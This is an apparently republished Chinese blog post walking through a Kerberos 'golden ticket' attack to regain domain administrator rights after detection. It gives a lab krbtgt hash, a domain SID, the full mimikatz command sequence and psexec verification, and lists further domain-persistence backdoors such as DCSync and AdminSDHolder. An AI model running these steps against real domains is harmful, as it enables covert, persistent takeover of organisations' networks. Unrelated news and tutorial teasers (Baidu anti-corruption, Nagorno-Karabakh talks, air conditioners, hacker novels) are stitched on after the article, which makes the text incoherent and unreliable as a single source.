最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的 ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的,不知道还有什么新 *** ,心中还有 *** ,如果想交流的朋友,可以加我聊聊。
我原来发过一个微博说
这就是我说的金之钥匙【"golden ticket(s)"黄金票据】,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:
要重新拿回域管理员权限,首先要先知道域内的管理员有谁
我这里的实验环境,通过截图可以看到域管理员是administrator
我还要知道域SID是啥
我的域SID是
还有最重要的krbtgt用户的ntlm哈希,我原来导出的是
krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::
然后该用神器mimikatz出场了,依次执行
mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt
到现在,我们又重新拥有域管理员权限了,可以验证下
E:\>net use \\WIN-0DKN2AS0T2G\c$
E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd
呃,感觉这个 *** 比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。
当然除了golden ticket,silver ticket之外还有kerberos ticket,历史SID,AdminSDHolder,DSRM,GPP,DCSync等技术手段都可以用来当做域控的隐藏后门。
【原文:域渗透的金之钥匙 作者:mickey 安全脉搏整理发布】
上半年,马云在淘宝内部掀起声势浩大的廉政行动,一批因为内外勾结而谋取不正当利益的“店小二”被“斩于刀下”。下半年,另一家互联网巨头接过了内部反腐的大旗,这就是百度。因为“收费删帖”,百度3名内部员工日...
中新网莫斯科1月11日电 (记者 王修君)11日亚美尼亚总理帕希尼扬与阿塞拜疆总统阿利耶夫抵达莫斯科,与俄总统普京共同讨论纳戈尔诺—卡拉巴赫(简称:纳卡)地区问题。 据俄总统办公厅消息,此次...
想要管理Application Information服务,该怎么开启,查看和关闭呢?下面我们就来看看详细的教程。 一、启动Application Information服务 1、在电脑桌面的左下...
高阶运营和初阶运营对比起来,主要的差距就是深度和广度。深度是思考的内核,而广度是运营技能板块的界线。 这个话题的由来 我的助理和我说,知乎上有个热门问题“高阶运营和初阶运营的不同”,让我好好答复一下...
本文导读目录: 1、谁介绍几本有关黑客的小说! 2、寻找一本关于黑客的小说,主角是一个学生,参加一个计算机比赛时得了第一名,第二名是本书的一个女主角。 3、介绍几篇关于计算机、黑客之类的小说!...
变频空调是指加装了变频器的常规空调。压缩机是空调的心脏,其转速直接影响到空调的使用效率,变频器就是用来控制和调整压缩机转速的控制系统,由于它的压缩机不会频繁开启,会使压缩机保持稳定的工作...